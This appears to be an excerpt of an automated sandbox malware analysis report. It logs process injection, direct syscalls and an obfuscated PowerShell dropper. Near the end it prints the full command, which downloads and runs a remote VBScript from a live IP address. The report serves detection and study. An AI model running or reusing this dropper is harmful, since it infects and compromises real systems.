                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050BCD mov eax, dword ptr fs:[00000030h]11_2_01050BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01070BCB mov eax, dword ptr fs:[00000030h]11_2_01070BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01070BCB mov eax, dword ptr fs:[00000030h]11_2_01070BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01070BCB mov eax, dword ptr fs:[00000030h]11_2_01070BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FEBD0 mov eax, dword ptr fs:[00000030h]11_2_010FEBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058BF0 mov eax, dword ptr fs:[00000030h]11_2_01058BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058BF0 mov eax, dword ptr fs:[00000030h]11_2_01058BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058BF0 mov eax, dword ptr fs:[00000030h]11_2_01058BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107EBFC mov eax, dword ptr fs:[00000030h]11_2_0107EBFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DCBF0 mov eax, dword ptr fs:[00000030h]11_2_010DCBF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DCA11 mov eax, dword ptr fs:[00000030h]11_2_010DCA11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107EA2E mov eax, dword ptr fs:[00000030h]11_2_0107EA2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108CA24 mov eax, dword ptr fs:[00000030h]11_2_0108CA24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108CA38 mov eax, dword ptr fs:[00000030h]11_2_0108CA38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01074A35 mov eax, dword ptr fs:[00000030h]11_2_01074A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01074A35 mov eax, dword ptr fs:[00000030h]11_2_01074A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056A50 mov eax, dword ptr fs:[00000030h]11_2_01056A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060A5B mov eax, dword ptr fs:[00000030h]11_2_01060A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060A5B mov eax, dword ptr fs:[00000030h]11_2_01060A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108CA6F mov eax, dword ptr fs:[00000030h]11_2_0108CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108CA6F mov eax, dword ptr fs:[00000030h]11_2_0108CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108CA6F mov eax, dword ptr fs:[00000030h]11_2_0108CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FEA60 mov eax, dword ptr fs:[00000030h]11_2_010FEA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CCA72 mov eax, dword ptr fs:[00000030h]11_2_010CCA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CCA72 mov eax, dword ptr fs:[00000030h]11_2_010CCA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA80 mov eax, dword ptr fs:[00000030h]11_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124A80 mov eax, dword ptr fs:[00000030h]11_2_01124A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088A90 mov edx, dword ptr fs:[00000030h]11_2_01088A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058AA0 mov eax, dword ptr fs:[00000030h]11_2_01058AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058AA0 mov eax, dword ptr fs:[00000030h]11_2_01058AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6AA4 mov eax, dword ptr fs:[00000030h]11_2_010A6AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050AD0 mov eax, dword ptr fs:[00000030h]11_2_01050AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084AD0 mov eax, dword ptr fs:[00000030h]11_2_01084AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084AD0 mov eax, dword ptr fs:[00000030h]11_2_01084AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108AAEE mov eax, dword ptr fs:[00000030h]11_2_0108AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108AAEE mov eax, dword ptr fs:[00000030h]11_2_0108AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01108D10 mov eax, dword ptr fs:[00000030h]11_2_01108D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01108D10 mov eax, dword ptr fs:[00000030h]11_2_01108D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084D1D mov eax, dword ptr fs:[00000030h]11_2_01084D1D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi32_5988.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi32_5988.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTR
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtClose: Direct from: 0x77382B6C
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeThread register set: target process: 5668Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 786008Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"Jump to behavior
